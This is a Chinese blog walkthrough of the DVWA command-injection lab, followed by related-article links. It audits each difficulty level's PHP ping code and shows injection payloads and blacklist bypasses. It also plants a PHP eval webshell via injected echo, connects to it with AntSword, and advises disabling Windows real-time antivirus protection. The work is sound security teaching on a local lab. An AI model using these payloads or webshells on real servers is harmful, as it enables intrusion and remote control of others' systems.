命令执行漏洞,顾名思义,服务端在进行一些网站的操作、管理的时候,需要调用系统命令,如果对传入的命令参数没有进行一些过滤,可以直接执行服务器系统的命令终端

LOW

审计源码

<?php

// 判断是否提交了 Submit

if( isset( $_POST[ 'Submit' ]  ) ) {

    // 获取 ip 传参,理想输入IP地址

    $target = $_REQUEST[ 'ip' ];

    // 确认操作系统

    // stristr() 截取 Windows NT 从开始到结束的位置

    // php_uname() 获取PHP版本信息 ,值为s,获取操作系统名称

    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {

        // 如果是windows,执行ping命令跟上传入的IP地址

        // shell_exec() 执行系统命令

        $cmd = shell_exec( 'ping  ' . $target );

    }

    else {

        // 如果是linux、unix等系统,执行 ping -c 4 四次测试,在Linux中ping是不会自动停止的

        $cmd = shell_exec( 'ping  -c 4 ' . $target );

    }

    // 打印命令执行结果

    echo "<pre>{$cmd}</pre>";

}

?>

可以看到,对输入的IP没有进行任何的过滤,可以直接进行命令注入

在windows命令行中,可以使用

& && | ||

& 符号



通过图片可以看出,&号无论ping执行正确还是失败,都会执行net user

&& 符号



&&只有ping命令执行成功后,后面的net user才可以执行成功

| 符号



|是意思是,将ping执行的结果,交给net user处理,只会回显net user的回显,但是无论ping执行是否成功,一定会执行net user

|| 符号



||会寻找正确的语句执行,执行完就会停止,可以看到,ping语句执行失败,执行了net user,第二条命令ping执行成功,没有执行echo,后面使用type验证echo没有执行成功

命令注入

在框中输入a|dir,查看当前目录文件,发现只有一个index.php



使用echo写入一句话木马a|echo "<?php @eval($_POST[cmd])?>" > a.php

如果在Windows 10中运行,现将安全中心的实时防护关闭



执行后没有任何回显,应该是写入成功了

继续使用a|dir查看木马是否写入成功



a.php已经被写入成功,使用a|type a.php查看a.php内容



只有两个双引号,里面的php语句应该是被当做页面执行了

使用蚁剑进行连接

蚁剑是一个类似于中国菜刀的工具,但是比起中国菜单更好用,下载见

启动器

源码

将启动器和源码分别解压,然后启动器启动时选择启动目录为加压的源码目录就可以使用

根据a|dir获取a.php木马的路径,D:\phpstudy_pro\WWW\dvwa\vulnerabilities\exec



那么在地址栏中就是http://127.0.0.1/dvwa/vulnerabilities/exec/a.php,测试连接成功



添加,双击进入可以查看靶机目录



利用成功

Medium

审计源码



<?php

if( isset( $_POST[ 'Submit' ]  ) ) {

    // 获取传入的 ip

    $target = $_REQUEST[ 'ip' ];

    // 定义字符黑名单

    $substitutions = array(

        '&&' => '',

        ';'  => '',

    );

    // 将黑名单中的字符过滤,替换为空

    // str_replace() 替换选中的字符

    // array_keys选中 && ;,

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // 判断操作系统

    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {

        // Windows

        $cmd = shell_exec( 'ping  ' . $target );

    }

    else {

        // *nix

        $cmd = shell_exec( 'ping  -c 4 ' . $target );

    }

    // 返回命令执行回显

    echo "<pre>{$cmd}</pre>";

}

?>

这里对&&;号进行了过滤,但是对我们没有什么影响,|依然能用

a|echo hello world测试



成功打印了hello wolrd

成功过关

High

审计源码

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {

    // 获取 IP 传参

    $target = trim($_REQUEST[ 'ip' ]);

    // 定义过滤黑名单

    $substitutions = array(

        '&'  => '',

        ';'  => '',

        '| ' => '',

        '-'  => '',

        '$'  => '',

        '('  => '',

        ')'  => '',

        '`'  => '',

        '||' => '',

    );

    // 将IP中的黑名单字符转换为空

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // 判断操作系统

    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {

        // Windows

        $cmd = shell_exec( 'ping  ' . $target );

    }

    else {

        // *nix

        $cmd = shell_exec( 'ping  -c 4 ' . $target );

    }

    // 返回命令执行回显

    echo "<pre>{$cmd}</pre>";

}

?>

可以看到和Medium的代码没什么区别,不过添加的黑名单变多了,|视乎也被过滤了

但是仔细观察会发现,过滤的是| ,|空格,并不是|,在程序中,空格也是一个字符



所以使用|依然可以使用

a|echo cnblogs.com/Junglezt,测试



执行成功,过关

Impossible

审计源码



<?php

if( isset( $_POST[ 'Submit' ]  ) ) {

    // 检查token值

    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // 获取输入的IP地址

    $target = $_REQUEST[ 'ip' ];

    // 去除左右两边的反斜杠

    $target = stripslashes( $target );

    // 将传入的IP使用 . 进行分割

    $octet = explode( ".", $target );

    // 根据IP地址的格式,判断用 . 分开的四个部分是不是数字

    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {

        // 如果是数字,将四个字数拼接为一个IP地址

        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // 判断操作系统

        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {

            // Windows

            $cmd = shell_exec( 'ping  ' . $target );

        }

        else {

            // *nix

            $cmd = shell_exec( 'ping  -c 4 ' . $target );

        }

        // 返回命令执行回显

        echo "<pre>{$cmd}</pre>";

    }

    else {

        // 命令执行失败,检查输入的是不是一个IP地址

        echo '<pre>ERROR: You have entered an invalid IP.</pre>';

    }

}

// 生成 user_token

generateSessionToken();

?>

引入了user_token,并且将输入的传参分割判断是不是IP地址的格式,所以这才是 Impossible

DVWA-Command Injection(命令执行)的更多相关文章

  1. DVWA之Command injection(命令执行漏洞)

    目录 Low Medium Middle Impossible 命令执行漏洞的原理:在操作系统中, &  .&& .|  . ||   都可以作为命令连接符使用,用户通过浏览器 ...

  2. 安全性测试入门:DVWA系列研究(二):Command Injection命令行注入攻击和防御

    本篇继续对于安全性测试话题,结合DVWA进行研习. Command Injection:命令注入攻击. 1. Command Injection命令注入 命令注入是通过在应用中执行宿主操作系统的命令, ...

  3. DVWA Command Injection 通关教程

    Command Injection 介绍 命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者bash命令)的一种注入攻 ...

  4. Fortify Audit Workbench 笔记 Command Injection(命令注入)

    Command Injection(命令注入) Abstract 执行不可信赖资源中的命令,或在不可信赖的环境中执行命令,都会导致程序以攻击者的名义执行恶意命令. Explanation Comman ...

  5. DVWA靶场练习-Command Injection命令注入

    Command Injection 原理 攻击者通过构造恶意参数,破坏命令的语句结构,从而达到执行恶意命令的目的.

  6. DVWA Command Injection 解析

    命令注入,即 Command Injection.是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的. 在Web应用中,有时候会用到一些命令执行的函数,如php中system.ex ...

  7. 2. DVWA亲测命令执行漏洞

        先看low级: 提示让我们输入一个IP地址来实现ping,猜测会是在系统终端中实现的, 我们正常输入127.0.0.1: 那我们就可以利用这个使用其他CMD命令  我们输入127.0.0.1& ...

  8. command injection命令注入

    命令注入 是指程序中有调用系统命令的部分,例如输入ip,程序调用系统命令ping这个ip.如果在ip后面加一个&&.&.|.||命令拼接符号再跟上自己需要执行的系统命令 在pi ...

  9. DVWA靶机的命令执行漏洞

    之前在打攻防世界的时候出现过类似的题目,这里再重温一下 (靶机一共低中高三个安全等级,这里只演示低中等级) (1)Security:low 根据提示让我们输入地址ping一下,之后返回以下内容,可以判 ...

  10. DVWA-对Command Injection(命令注入)的简单演示与分析

    前言 上一篇文章中,对命令注入进行了简单的分析,有兴趣的可以去看一看,文章地址 https://www.cnblogs.com/lxfweb/p/12828754.html,今天这篇文章以DVWA的C ...

随机推荐

  1. 《Unix/Linux系统编程》第十三章学习笔记 20201209戴骏

    TCP/IP协议 从字面意义上讲,有人可能会认为 TCP/IP 是指 TCP 和 IP 两种协议.实际生活当中有时也确实就是指这两种协议.然而在很多情况下,它只是利用 IP 进行通信时所必须用到的协议 ...

  2. C# 调用https接口 安全证书问题 解决方法

    原文链接: https://blog.csdn.net/lizaijinsheng/article/details/127321758 说明: 如果是用https的话,由于没有证书,会报错:基础连接已 ...

  3. 给定两个字符串,均只包含英文字母,需区分大小写,一个是源字符串SS(长度<1000), 另一个是目标字符串TS(长度<1000),请问能否通过删除SS中的字符(不改变顺序)将它变换成TS,如果可以输出“YES",不可以则输出“NO"。 输入说明:第一行为源字符串SS,第二行为目标字符串TS。

    import java.util.Scanner;/*    给定两个字符串,均只包含英文字母,需区分大小写,一个是源字符串SS(长度<1000),    另一个是目标字符串TS(长度<1 ...

  4. 在使用admin后台管理,添加或者修改数据库时,出现错误,no such table: main.auth_user__old

    在使用admin后台管理,添加或者修改数据库时,出现错误,no such table: main.auth_user__old. Django是2.0.9的版本,python是3.8.0 上述错误是因 ...

  5. scala中的数据类型

    一.Scala的数据类型 (1). scala中一切数据都是对象,都是Any的子类: (2).scala中数据类型分为两大类:数值类型(AnyVal,即any value,任意值).引用类型(AnyR ...

  6. Debug --> CICFlowMeter的java版本安装及使用

    一. 首先,给出一个很详细的配置链接!使用IDEA进行配置~ https://blog.csdn.net/BananaMan45/article/details/105473151?utm_mediu ...

  7. 132pattern-Leetcode456

    QUESTION: To search for a subsequence (s1,s2,s3) such that s1 < s3 < s2. INTUITION: Suppose we ...

  8. 【闫式dp分析法】

  9. Flowable 中文文档

    中文文档:https://tkjohn.github.io/flowable-userguide/#bpmnInclusiveGatewayGraphicalNotation

  10. SpringBoot - Lombok使用详解5(@log、@Buinder、@SneakyThrows、@Synchronized)

    七.Lombok注解详解(5) 12,@log (1)该注解用在类上,可以省去从日志工厂生成日志对象这一步,直接进行日志记录,具体注解根据日志工具的不同而不同.不同的日志注解总结如下(上面是注解,下面 ...